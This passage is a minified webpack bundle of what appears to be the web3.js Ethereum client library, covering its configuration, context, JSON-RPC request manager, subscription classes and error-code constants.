                        this._triggerConfigChange("defaultMaxPriorityFeePerGas", e), this.config.defaultMaxPriorityFeePerGas = e;
                    }
                    get transactionBuilder() {
                        return this.config.transactionBuilder;
                    }
                    set transactionBuilder(e) {
                        this._triggerConfigChange("transactionBuilder", e), this.config.transactionBuilder = e;
                    }
                    get transactionTypeParser() {
                        return this.config.transactionTypeParser;
                    }
                    set transactionTypeParser(e) {
                        this._triggerConfigChange("transactionTypeParser", e), this.config.transactionTypeParser = e;
                    }
                    _triggerConfigChange(e, t) {
                        this.emit(s.CONFIG_CHANGE, {
                            name: e,
                            oldValue: this.config[e],
                            newValue: t
                        });
                    }
                }
                t.Web3Config = a;
            },
            8174: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3EthPluginBase = t.Web3PluginBase = t.Web3Context = void 0;
                const n = r(9634), i = r(5071), o = r(7003), s = r(6171), a = r(8441), u = r(860), c = r(8202);
                class l extends s.Web3Config {
                    constructor(e){
                        var t;
                        if (super(), this.providers = a.Web3RequestManager.providers, (0, n.isNullish)(e) || "string" == typeof e && "" !== e.trim() || (0, o.isSupportedProvider)(e)) return this._requestManager = new a.Web3RequestManager(e), void (this._subscriptionManager = new u.Web3SubscriptionManager(this._requestManager, {}));
                        const { config: r, provider: i, requestManager: s, subscriptionManager: c, registeredSubscriptions: l, accountProvider: d, wallet: h } = e;
                        this.setConfig(null != r ? r : {}), this._requestManager = null != s ? s : new a.Web3RequestManager(i, null === (t = null == r ? void 0 : r.enableExperimentalFeatures) || void 0 === t ? void 0 : t.useSubscriptionWhenCheckingBlockTimeout), this._subscriptionManager = c || new u.Web3SubscriptionManager(this.requestManager, null != l ? l : {}), d && (this._accountProvider = d), h && (this._wallet = h);
                    }
                    get requestManager() {
                        return this._requestManager;
                    }
                    get subscriptionManager() {
                        return this._subscriptionManager;
                    }
                    get wallet() {
                        return this._wallet;
                    }
                    get accountProvider() {
                        return this._accountProvider;
                    }
                    static fromContextObject(...e) {
                        return new this(...e.reverse());
                    }
                    getContextObject() {
                        var e;
                        return {
                            config: this.config,
                            provider: this.provider,
                            requestManager: this.requestManager,
                            subscriptionManager: this.subscriptionManager,
                            registeredSubscriptions: null === (e = this.subscriptionManager) || void 0 === e ? void 0 : e.registeredSubscriptions,
                            providers: this.providers,
                            wallet: this.wallet,
                            accountProvider: this.accountProvider
                        };
                    }
                    use(e, ...t) {
                        const r = new e(...[
                            ...t,
                            this.getContextObject()
                        ]);
                        return this.on(s.Web3ConfigEvent.CONFIG_CHANGE, (e)=>{
                            r.setConfig({
                                [e.name]: e.newValue
                            });
                        }), r;
                    }
                    link(e) {
                        this.setConfig(e.config), this._requestManager = e.requestManager, this.provider = e.provider, this._subscriptionManager = e.subscriptionManager, this._wallet = e.wallet, this._accountProvider = e._accountProvider, e.on(s.Web3ConfigEvent.CONFIG_CHANGE, (e)=>{
                            this.setConfig({
                                [e.name]: e.newValue
                            });
                        });
                    }
                    registerPlugin(e) {
                        if (void 0 !== this[e.pluginNamespace]) throw new i.ExistingPluginNamespaceError(e.pluginNamespace);
                        const t = {
                            [e.pluginNamespace]: e
                        };
                        t[e.pluginNamespace].link(this), Object.assign(this, t);
                    }
                    get provider() {
                        return this.currentProvider;
                    }
                    set provider(e) {
                        this.requestManager.setProvider(e);
                    }
                    get currentProvider() {
                        return this.requestManager.provider;
                    }
                    set currentProvider(e) {
                        this.requestManager.setProvider(e);
                    }
                    get givenProvider() {
                        return l.givenProvider;
                    }
                    setProvider(e) {
                        return this.provider = e, !0;
                    }
                    get BatchRequest() {
                        return c.Web3BatchRequest.bind(void 0, this._requestManager);
                    }
                }
                t.Web3Context = l, l.providers = a.Web3RequestManager.providers;
                class d extends l {
                }
                t.Web3PluginBase = d, t.Web3EthPluginBase = class extends d {
                };
            },
            8976: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3EventEmitter = void 0;
                const n = r(2699);
                t.Web3EventEmitter = class {
                    constructor(){
                        this._emitter = new n.EventEmitter;
                    }
                    on(e, t) {
                        this._emitter.on(e, t);
                    }
                    once(e, t) {
                        this._emitter.once(e, t);
                    }
                    off(e, t) {
                        this._emitter.off(e, t);
                    }
                    emit(e, t) {
                        this._emitter.emit(e, t);
                    }
                    listenerCount(e) {
                        return this._emitter.listenerCount(e);
                    }
                    listeners(e) {
                        return this._emitter.listeners(e);
                    }
                    eventNames() {
                        return this._emitter.eventNames();
                    }
                    removeAllListeners() {
                        return this._emitter.removeAllListeners();
                    }
                    setMaxListenerWarningThreshold(e) {
                        this._emitter.setMaxListeners(e);
                    }
                    getMaxListeners() {
                        return this._emitter.getMaxListeners();
                    }
                };
            },
            4738: function(e, t, r) {
                "use strict";
                var n, i = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3PromiEvent = void 0;
                const o = r(8976);
                class s extends o.Web3EventEmitter {
                    constructor(e){
                        super(), this[n] = "Promise", this._promise = new Promise(e);
                    }
                    then(e, t) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.then(e, t);
                        });
                    }
                    catch(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.catch(e);
                        });
                    }
                    finally(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.finally(e);
                        });
                    }
                    on(e, t) {
                        return super.on(e, t), this;
                    }
                    once(e, t) {
                        return super.once(e, t), this;
                    }
                }
                t.Web3PromiEvent = s, n = Symbol.toStringTag;
            },
            8441: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                }, i = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3RequestManager = t.Web3RequestManagerEvent = void 0;
                const o = r(5071), s = i(r(6343)), a = i(r(1161)), u = r(9634), c = r(7003), l = r(8976);
                var d;
                !function(e) {
                    e.PROVIDER_CHANGED = "PROVIDER_CHANGED", e.BEFORE_PROVIDER_CHANGE = "BEFORE_PROVIDER_CHANGE";
                }(d = t.Web3RequestManagerEvent || (t.Web3RequestManagerEvent = {}));
                const h = {
                    HttpProvider: s.default,
                    WebsocketProvider: a.default
                };
                class f extends l.Web3EventEmitter {
                    constructor(e, t){
                        super(), (0, u.isNullish)(e) || this.setProvider(e), this.useRpcCallSpecification = t;
                    }
                    static get providers() {
                        return h;
                    }
                    get provider() {
                        return this._provider;
                    }
                    get providers() {
                        return h;
                    }
                    setProvider(e) {
                        let t;
                        if (e && "string" == typeof e && this.providers) {
                            if (/^http(s)?:\/\//i.test(e)) t = new this.providers.HttpProvider(e);
                            else {
                                if (!/^ws(s)?:\/\//i.test(e)) throw new o.ProviderError(`Can't autodetect provider for "${e}"`);
                                t = new this.providers.WebsocketProvider(e);
                            }
                        } else t = (0, u.isNullish)(e) ? void 0 : e;
                        return this.emit(d.BEFORE_PROVIDER_CHANGE, this._provider), this._provider = t, this.emit(d.PROVIDER_CHANGED, this._provider), !0;
                    }
                    send(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = yield this._sendRequest(e);
                            if (u.jsonRpc.isResponseWithResult(t)) return t.result;
                            throw new o.ResponseError(t);
                        });
                    }
                    sendBatch(e) {
                        return n(this, void 0, void 0, function*() {
                            return yield this._sendRequest(e);
                        });
                    }
                    _sendRequest(e) {
                        return n(this, void 0, void 0, function*() {
                            const { provider: t } = this;
                            if ((0, u.isNullish)(t)) throw new o.ProviderError("Provider not available. Use `.setProvider` or `.provider=` to initialize the provider.");
                            const r = u.jsonRpc.isBatchRequest(e) ? u.jsonRpc.toBatchPayload(e) : u.jsonRpc.toPayload(e);
                            if ((0, c.isWeb3Provider)(t)) {
                                let e;
                                try {
                                    e = yield t.request(r);
                                } catch (t) {
                                    e = t;
                                }
                                return this._processJsonRpcResponse(r, e, {
                                    legacy: !1,
                                    error: !1
                                });
                            }
                            if ((0, c.isEIP1193Provider)(t)) return t.request(r).then((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !1
                                })).catch((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !0
                                }));
                            if ((0, c.isLegacyRequestProvider)(t)) return new Promise((e, n)=>{
                                const i = (e)=>n(this._processJsonRpcResponse(r, e, {
                                        legacy: !0,
                                        error: !0
                                    })), o = (t)=>e(this._processJsonRpcResponse(r, t, {
                                        legacy: !0,
                                        error: !1
                                    })), s = t.request(r, (e, t)=>e ? i(e) : o(t));
                                (0, u.isPromise)(s) && s.then(o).catch(i);
                            });
                            if ((0, c.isLegacySendProvider)(t)) return new Promise((e, n)=>{
                                t.send(r, (t, i)=>{
                                    if (t) return n(this._processJsonRpcResponse(r, t, {
                                        legacy: !0,
                                        error: !0
                                    }));
                                    if ((0, u.isNullish)(i)) throw new o.ResponseError("", 'Got a "nullish" response from provider.');
                                    return e(this._processJsonRpcResponse(r, i, {
                                        legacy: !0,
                                        error: !1
                                    }));
                                });
                            });
                            if ((0, c.isLegacySendAsyncProvider)(t)) return t.sendAsync(r).then((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !1
                                })).catch((e)=>this._processJsonRpcResponse(r, e, {
                                    legacy: !0,
                                    error: !0
                                }));
                            throw new o.ProviderError("Provider does not have a request or send method to use.");
                        });
                    }
                    _processJsonRpcResponse(e, t, { legacy: r, error: n }) {
                        if ((0, u.isNullish)(t)) return this._buildResponse(e, null, n);
                        if (u.jsonRpc.isResponseWithError(t)) {
                            if (this.useRpcCallSpecification && (0, u.isResponseRpcError)(t)) {
                                const e = t;
                                if (o.rpcErrorsMap.get(e.error.code)) throw new (o.rpcErrorsMap.get(e.error.code)).error(e);
                                throw new o.RpcError(e);
                            }
                            if (!f._isReverted(t)) throw new o.InvalidResponseError(t, e);
                        }
                        if (u.jsonRpc.isResponseWithResult(t)) return t;
                        if (t instanceof Error) throw f._isReverted(t), t;
                        if (!r && u.jsonRpc.isBatchRequest(e) && u.jsonRpc.isBatchResponse(t)) return t;
                        if (r && !n && u.jsonRpc.isBatchRequest(e)) return t;
                        if (r && n && u.jsonRpc.isBatchRequest(e)) throw t;
                        if (r && !u.jsonRpc.isResponseWithError(t) && !u.jsonRpc.isResponseWithResult(t)) return this._buildResponse(e, t, n);
                        if (u.jsonRpc.isBatchRequest(e) && !Array.isArray(t)) throw new o.ResponseError(t, "Got normal response for a batch request.");
                        if (!u.jsonRpc.isBatchRequest(e) && Array.isArray(t)) throw new o.ResponseError(t, "Got batch response for a normal request.");
                        if ((u.jsonRpc.isResponseWithError(t) || u.jsonRpc.isResponseWithResult(t)) && !u.jsonRpc.isBatchRequest(e) && t.id && e.id !== t.id) throw new o.InvalidResponseError(t);
                        throw new o.ResponseError(t, "Invalid response");
                    }
                    static _isReverted(e) {
                        let t;
                        if (u.jsonRpc.isResponseWithError(e) ? t = e.error : e instanceof Error && (t = e), null == t ? void 0 : t.message.includes("revert")) throw new o.ContractExecutionError(t);
                        return !1;
                    }
                    _buildResponse(e, t, r) {
                        const n = {
                            jsonrpc: "2.0",
                            id: u.jsonRpc.isBatchRequest(e) ? e[0].id : "id" in e ? e.id : null
                        };
                        return r ? Object.assign(Object.assign({}, n), {
                            error: t
                        }) : Object.assign(Object.assign({}, n), {
                            result: t
                        });
                    }
                }
                t.Web3RequestManager = f;
            },
            860: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3SubscriptionManager = void 0;
                const i = r(9970), o = r(5071), s = r(9634), a = r(7003), u = r(8441);
                t.Web3SubscriptionManager = class {
                    constructor(e, t, r = !1){
                        this.requestManager = e, this.registeredSubscriptions = t, this.tolerateUnlinkedSubscription = r, this._subscriptions = new Map, this.requestManager.on(u.Web3RequestManagerEvent.BEFORE_PROVIDER_CHANGE, ()=>n(this, void 0, void 0, function*() {
                                yield this.unsubscribe();
                            })), this.requestManager.on(u.Web3RequestManagerEvent.PROVIDER_CHANGED, ()=>{
                            this.clear(), this.listenToProviderEvents();
                        }), this.listenToProviderEvents();
                    }
                    listenToProviderEvents() {
                        const e = this.requestManager.provider;
                        this.requestManager.provider && ("function" != typeof (null == e ? void 0 : e.supportsSubscriptions) || (null == e ? void 0 : e.supportsSubscriptions())) && "function" == typeof this.requestManager.provider.on && ("function" == typeof this.requestManager.provider.request ? this.requestManager.provider.on("message", (e)=>this.messageListener(e)) : e.on("data", (e)=>this.messageListener(e)));
                    }
                    messageListener(e) {
                        var t, r, n;
                        if (!e) throw new o.SubscriptionError("Should not call messageListener with no data. Type was");
                        const i = (null === (t = e.params) || void 0 === t ? void 0 : t.subscription) || (null === (r = e.data) || void 0 === r ? void 0 : r.subscription) || (null === (n = e.id) || void 0 === n ? void 0 : n.toString(16));
                        if (i) {
                            const t = this._subscriptions.get(i);
                            null == t || t.processSubscriptionData(e);
                        }
                    }
                    subscribe(e, t, r = i.DEFAULT_RETURN_FORMAT) {
                        return n(this, void 0, void 0, function*() {
                            const n = this.registeredSubscriptions[e];
                            if (!n) throw new o.SubscriptionError("Invalid subscription type");
                            const i = new n(null != t ? t : void 0, {
                                subscriptionManager: this,
                                returnFormat: r
                            });
                            return yield this.addSubscription(i), i;
                        });
                    }
                    get subscriptions() {
                        return this._subscriptions;
                    }
                    addSubscription(e) {
                        return n(this, void 0, void 0, function*() {
                            if (!this.requestManager.provider) throw new o.ProviderError("Provider not available");
                            if (!this.supportsSubscriptions()) throw new o.SubscriptionError("The current provider does not support subscriptions");
                            if (e.id && this._subscriptions.has(e.id)) throw new o.SubscriptionError(`Subscription with id "${e.id}" already exists`);
                            if (yield e.sendSubscriptionRequest(), (0, s.isNullish)(e.id)) throw new o.SubscriptionError("Subscription is not subscribed yet.");
                            return this._subscriptions.set(e.id, e), e.id;
                        });
                    }
                    removeSubscription(e) {
                        return n(this, void 0, void 0, function*() {
                            const { id: t } = e;
                            if ((0, s.isNullish)(t)) throw new o.SubscriptionError("Subscription is not subscribed yet. Or, had already been unsubscribed but not through the Subscription Manager.");
                            if (!this._subscriptions.has(t) && !this.tolerateUnlinkedSubscription) throw new o.SubscriptionError(`Subscription with id "${t.toString()}" does not exists`);
                            return yield e.sendUnsubscribeRequest(), this._subscriptions.delete(t), t;
                        });
                    }
                    unsubscribe(e) {
                        return n(this, void 0, void 0, function*() {
                            const t = [];
                            for (const [r, n] of this.subscriptions.entries())(!e || "function" == typeof e && e({
                                id: r,
                                sub: n
                            })) && t.push(this.removeSubscription(n));
                            return Promise.all(t);
                        });
                    }
                    clear() {
                        this._subscriptions.clear();
                    }
                    supportsSubscriptions() {
                        return !(0, s.isNullish)(this.requestManager.provider) && (0, a.isSupportSubscriptions)(this.requestManager.provider);
                    }
                };
            },
            1819: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Subscription = void 0;
                const i = r(9970), o = r(9634), s = r(5071), a = r(860), u = r(8976);
                class c extends u.Web3EventEmitter {
                    constructor(e, t){
                        var r;
                        super(), this.args = e;
                        const { requestManager: n } = t, { subscriptionManager: o } = t;
                        if (n && o) throw new s.SubscriptionError("Only requestManager or subscriptionManager should be provided at Subscription constructor");
                        if (!n && !o) throw new s.SubscriptionError("Either requestManager or subscriptionManager should be provided at Subscription constructor");
                        this._subscriptionManager = n ? new a.Web3SubscriptionManager(n, {}, !0) : o, this._returnFormat = null !== (r = null == t ? void 0 : t.returnFormat) && void 0 !== r ? r : i.DEFAULT_RETURN_FORMAT;
                    }
                    get id() {
                        return this._id;
                    }
                    get lastBlock() {
                        return this._lastBlock;
                    }
                    subscribe() {
                        return n(this, void 0, void 0, function*() {
                            return this._subscriptionManager.addSubscription(this);
                        });
                    }
                    processSubscriptionData(e) {
                        var t, r;
                        (null == e ? void 0 : e.data) ? this._processSubscriptionResult(null !== (r = null === (t = null == e ? void 0 : e.data) || void 0 === t ? void 0 : t.result) && void 0 !== r ? r : null == e ? void 0 : e.data) : e && o.jsonRpc.isResponseWithNotification(e) && this._processSubscriptionResult(null == e ? void 0 : e.params.result);
                    }
                    sendSubscriptionRequest() {
                        return n(this, void 0, void 0, function*() {
                            return this._id = yield this._subscriptionManager.requestManager.send({
                                method: "eth_subscribe",
                                params: this._buildSubscriptionParams()
                            }), this._id;
                        });
                    }
                    get returnFormat() {
                        return this._returnFormat;
                    }
                    resubscribe() {
                        return n(this, void 0, void 0, function*() {
                            yield this.unsubscribe(), yield this.subscribe();
                        });
                    }
                    unsubscribe() {
                        return n(this, void 0, void 0, function*() {
                            this.id && (yield this._subscriptionManager.removeSubscription(this));
                        });
                    }
                    sendUnsubscribeRequest() {
                        return n(this, void 0, void 0, function*() {
                            yield this._subscriptionManager.requestManager.send({
                                method: "eth_unsubscribe",
                                params: [
                                    this.id
                                ]
                            }), this._id = void 0;
                        });
                    }
                    _processSubscriptionResult(e) {}
                    _processSubscriptionError(e) {}
                    _buildSubscriptionParams() {
                        throw new Error("Implement in the child class");
                    }
                }
                t.Web3Subscription = c;
            },
            7639: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ERR_TX_RECEIPT_MISSING_OR_BLOCKHASH_NULL = t.ERR_TX_POLLING_TIMEOUT = t.ERR_TX_DATA_AND_INPUT = t.ERR_TX_UNSUPPORTED_TYPE = t.ERR_TX_UNSUPPORTED_EIP_1559 = t.ERR_TX_UNABLE_TO_POPULATE_NONCE = t.ERR_TX_INVALID_NONCE_OR_CHAIN_ID = t.ERR_TX_INVALID_OBJECT = t.ERR_TX_INVALID_LEGACY_FEE_MARKET = t.ERR_TX_INVALID_FEE_MARKET_GAS_PRICE = t.ERR_TX_INVALID_FEE_MARKET_GAS = t.ERR_TX_INVALID_LEGACY_GAS = t.ERR_TX_MISSING_GAS = t.ERR_TX_MISSING_CHAIN_INFO = t.ERR_TX_INVALID_CHAIN_INFO = t.ERR_TX_CHAIN_ID_MISMATCH = t.ERR_TX_MISSING_CUSTOM_CHAIN_ID = t.ERR_TX_MISSING_CUSTOM_CHAIN = t.ERR_TX_INVALID_CALL = t.ERR_TX_INVALID_SENDER = t.ERR_RAW_TX_UNDEFINED = t.ERR_TX_OUT_OF_GAS = t.ERR_TX_REVERT_WITHOUT_REASON = t.ERR_TX_CONTRACT_NOT_STORED = t.ERR_TX_NO_CONTRACT_ADDRESS = t.ERR_TX_REVERT_TRANSACTION = t.ERR_TX_REVERT_INSTRUCTION = t.ERR_TX = t.ERR_CONTRACT_TX_DATA_AND_INPUT = t.ERR_CONTRACT_EXECUTION_REVERTED = t.ERR_CONTRACT_INSTANTIATION = t.ERR_CONTRACT_MISSING_FROM_ADDRESS = t.ERR_CONTRACT_MISSING_ADDRESS = t.ERR_CONTRACT_MISSING_DEPLOY_DATA = t.ERR_CONTRACT_RESERVED_EVENT = t.ERR_CONTRACT_EVENT_NOT_EXISTS = t.ERR_CONTRACT_REQUIRED_CALLBACK = t.ERR_CONTRACT_ABI_MISSING = t.ERR_CONTRACT_RESOLVER_MISSING = t.ERR_CONTRACT = t.ERR_INVALID_METHOD_PARAMS = t.ERR_EXISTING_PLUGIN_NAMESPACE = t.ERR_ABI_ENCODING = t.ERR_OPERATION_ABORT = t.ERR_OPERATION_TIMEOUT = t.ERR_METHOD_NOT_IMPLEMENTED = t.ERR_FORMATTERS = t.ERR_PARAM = t.ERR_INVALID_RESPONSE = t.ERR_RESPONSE = void 0, t.ERR_INVALID_ADDRESS = t.ERR_INVALID_UNIT = t.ERR_INVALID_NUMBER = t.ERR_INVALID_BYTES = t.ERR_INVALID_STRING = t.ERR_ENS_NETWORK_NOT_SYNCED = t.ERR_ENS_UNSUPPORTED_NETWORK = t.ERR_ENS_CHECK_INTERFACE_SUPPORT = t.JSONRPC_ERR_CHAIN_DISCONNECTED = t.JSONRPC_ERR_DISCONNECTED = t.JSONRPC_ERR_UNSUPPORTED_METHOD = t.JSONRPC_ERR_UNAUTHORIZED = t.JSONRPC_ERR_REJECTED_REQUEST = t.GENESIS_BLOCK_NUMBER = t.ERR_INVALID_SIGNATURE = t.ERR_SIGNATURE_FAILED = t.ERR_PBKDF2_ITERATIONS = t.ERR_INVALID_KEYSTORE = t.ERR_IV_LENGTH = t.ERR_INVALID_PASSWORD = t.ERR_KEY_VERSION_UNSUPPORTED = t.ERR_KEY_DERIVATION_FAIL = t.ERR_UNSUPPORTED_KDF = t.ERR_INVALID_PRIVATE_KEY = t.ERR_PRIVATE_KEY_LENGTH = t.ERR_WS_PROVIDER = t.ERR_SUBSCRIPTION = t.ERR_INVALID_CLIENT = t.ERR_INVALID_PROVIDER = t.ERR_PROVIDER = t.ERR_REQ_ALREADY_SENT = t.ERR_CONN_PENDING_REQUESTS = t.ERR_CONN_MAX_ATTEMPTS = t.ERR_CONN_CLOSE = t.ERR_CONN_NOT_OPEN = t.ERR_CONN_TIMEOUT = t.ERR_CONN_INVALID = t.ERR_CONN = t.ERR_TX_INVALID_PROPERTIES_FOR_TYPE = t.ERR_TX_REVERT_TRANSACTION_CUSTOM_ERROR = t.ERR_TX_INVALID_RECEIVER = t.ERR_TX_HARDFORK_MISMATCH = t.ERR_TX_CHAIN_MISMATCH = t.ERR_TX_GAS_MISMATCH = t.ERR_TX_SIGNING = t.ERR_TX_BLOCK_TIMEOUT = t.ERR_TX_SEND_TIMEOUT = t.ERR_TX_NOT_FOUND = t.ERR_TX_LOCAL_WALLET_NOT_AVAILABLE = t.ERR_TX_RECEIPT_MISSING_BLOCK_NUMBER = void 0, t.ERR_RPC_NOT_SUPPORTED = t.ERR_RPC_LIMIT_EXCEEDED = t.ERR_RPC_UNSUPPORTED_METHOD = t.ERR_RPC_TRANSACTION_REJECTED = t.ERR_RPC_UNAVAILABLE_RESOURCE = t.ERR_RPC_MISSING_RESOURCE = t.ERR_RPC_INVALID_INPUT = t.ERR_RPC_INTERNAL_ERROR = t.ERR_RPC_INVALID_PARAMS = t.ERR_RPC_INVALID_METHOD = t.ERR_RPC_INVALID_REQUEST = t.ERR_RPC_INVALID_JSON = t.ERR_CORE_CHAIN_MISMATCH = t.ERR_CORE_HARDFORK_MISMATCH = t.ERR_VALIDATION = t.ERR_INVALID_NIBBLE_WIDTH = t.ERR_INVALID_TYPE_ABI = t.ERR_INVALID_BLOCK = t.ERR_INVALID_LARGE_VALUE = t.ERR_INVALID_SIZE = t.ERR_INVALID_UNSIGNED_INTEGER = t.ERR_INVALID_BOOLEAN = t.ERR_INVALID_TYPE = t.ERR_INVALID_HEX = void 0, t.ERR_RESPONSE = 100, t.ERR_INVALID_RESPONSE = 101, t.ERR_PARAM = 200, t.ERR_FORMATTERS = 201, t.ERR_METHOD_NOT_IMPLEMENTED = 202, t.ERR_OPERATION_TIMEOUT = 203, t.ERR_OPERATION_ABORT = 204, t.ERR_ABI_ENCODING = 205, t.ERR_EXISTING_PLUGIN_NAMESPACE = 206, t.ERR_INVALID_METHOD_PARAMS = 207, t.ERR_CONTRACT = 300, t.ERR_CONTRACT_RESOLVER_MISSING = 301, t.ERR_CONTRACT_ABI_MISSING = 302, t.ERR_CONTRACT_REQUIRED_CALLBACK = 303, t.ERR_CONTRACT_EVENT_NOT_EXISTS = 304, t.ERR_CONTRACT_RESERVED_EVENT = 305, t.ERR_CONTRACT_MISSING_DEPLOY_DATA = 306, t.ERR_CONTRACT_MISSING_ADDRESS = 307, t.ERR_CONTRACT_MISSING_FROM_ADDRESS = 308, t.ERR_CONTRACT_INSTANTIATION = 309, t.ERR_CONTRACT_EXECUTION_REVERTED = 310, t.ERR_CONTRACT_TX_DATA_AND_INPUT = 311, t.ERR_TX = 400, t.ERR_TX_REVERT_INSTRUCTION = 401, t.ERR_TX_REVERT_TRANSACTION = 402, t.ERR_TX_NO_CONTRACT_ADDRESS = 403, t.ERR_TX_CONTRACT_NOT_STORED = 404, t.ERR_TX_REVERT_WITHOUT_REASON = 405, t.ERR_TX_OUT_OF_GAS = 406, t.ERR_RAW_TX_UNDEFINED = 407, t.ERR_TX_INVALID_SENDER = 408, t.ERR_TX_INVALID_CALL = 409, t.ERR_TX_MISSING_CUSTOM_CHAIN = 410, t.ERR_TX_MISSING_CUSTOM_CHAIN_ID = 411, t.ERR_TX_CHAIN_ID_MISMATCH = 412, t.ERR_TX_INVALID_CHAIN_INFO = 413, t.ERR_TX_MISSING_CHAIN_INFO = 414, t.ERR_TX_MISSING_GAS = 415, t.ERR_TX_INVALID_LEGACY_GAS = 416, t.ERR_TX_INVALID_FEE_MARKET_GAS = 417, t.ERR_TX_INVALID_FEE_MARKET_GAS_PRICE = 418, t.ERR_TX_INVALID_LEGACY_FEE_MARKET = 419, t.ERR_TX_INVALID_OBJECT = 420, t.ERR_TX_INVALID_NONCE_OR_CHAIN_ID = 421, t.ERR_TX_UNABLE_TO_POPULATE_NONCE = 422, t.ERR_TX_UNSUPPORTED_EIP_1559 = 423, t.ERR_TX_UNSUPPORTED_TYPE = 424, t.ERR_TX_DATA_AND_INPUT = 425, t.ERR_TX_POLLING_TIMEOUT = 426, t.ERR_TX_RECEIPT_MISSING_OR_BLOCKHASH_NULL = 427, t.ERR_TX_RECEIPT_MISSING_BLOCK_NUMBER = 428, t.ERR_TX_LOCAL_WALLET_NOT_AVAILABLE = 429, t.ERR_TX_NOT_FOUND = 430, t.ERR_TX_SEND_TIMEOUT = 431, t.ERR_TX_BLOCK_TIMEOUT = 432, t.ERR_TX_SIGNING = 433, t.ERR_TX_GAS_MISMATCH = 434, t.ERR_TX_CHAIN_MISMATCH = 435, t.ERR_TX_HARDFORK_MISMATCH = 436, t.ERR_TX_INVALID_RECEIVER = 437, t.ERR_TX_REVERT_TRANSACTION_CUSTOM_ERROR = 438, t.ERR_TX_INVALID_PROPERTIES_FOR_TYPE = 439, t.ERR_CONN = 500, t.ERR_CONN_INVALID = 501, t.ERR_CONN_TIMEOUT = 502, t.ERR_CONN_NOT_OPEN = 503, t.ERR_CONN_CLOSE = 504, t.ERR_CONN_MAX_ATTEMPTS = 505, t.ERR_CONN_PENDING_REQUESTS = 506, t.ERR_REQ_ALREADY_SENT = 507, t.ERR_PROVIDER = 600, t.ERR_INVALID_PROVIDER = 601, t.ERR_INVALID_CLIENT = 602, t.ERR_SUBSCRIPTION = 603, t.ERR_WS_PROVIDER = 604, t.ERR_PRIVATE_KEY_LENGTH = 701, t.ERR_INVALID_PRIVATE_KEY = 702, t.ERR_UNSUPPORTED_KDF = 703, t.ERR_KEY_DERIVATION_FAIL = 704, t.ERR_KEY_VERSION_UNSUPPORTED = 705, t.ERR_INVALID_PASSWORD = 706, t.ERR_IV_LENGTH = 707, t.ERR_INVALID_KEYSTORE = 708, t.ERR_PBKDF2_ITERATIONS = 709, t.ERR_SIGNATURE_FAILED = 801, t.ERR_INVALID_SIGNATURE = 802, t.GENESIS_BLOCK_NUMBER = "0x0", t.JSONRPC_ERR_REJECTED_REQUEST = 4001, t.JSONRPC_ERR_UNAUTHORIZED = 4100, t.JSONRPC_ERR_UNSUPPORTED_METHOD = 4200, t.JSONRPC_ERR_DISCONNECTED = 4900, t.JSONRPC_ERR_CHAIN_DISCONNECTED = 4901, t.ERR_ENS_CHECK_INTERFACE_SUPPORT = 901, t.ERR_ENS_UNSUPPORTED_NETWORK = 902, t.ERR_ENS_NETWORK_NOT_SYNCED = 903, t.ERR_INVALID_STRING = 1001, t.ERR_INVALID_BYTES = 1002, t.ERR_INVALID_NUMBER = 1003, t.ERR_INVALID_UNIT = 1004, t.ERR_INVALID_ADDRESS = 1005, t.ERR_INVALID_HEX = 1006, t.ERR_INVALID_TYPE = 1007, t.ERR_INVALID_BOOLEAN = 1008, t.ERR_INVALID_UNSIGNED_INTEGER = 1009, t.ERR_INVALID_SIZE = 1010, 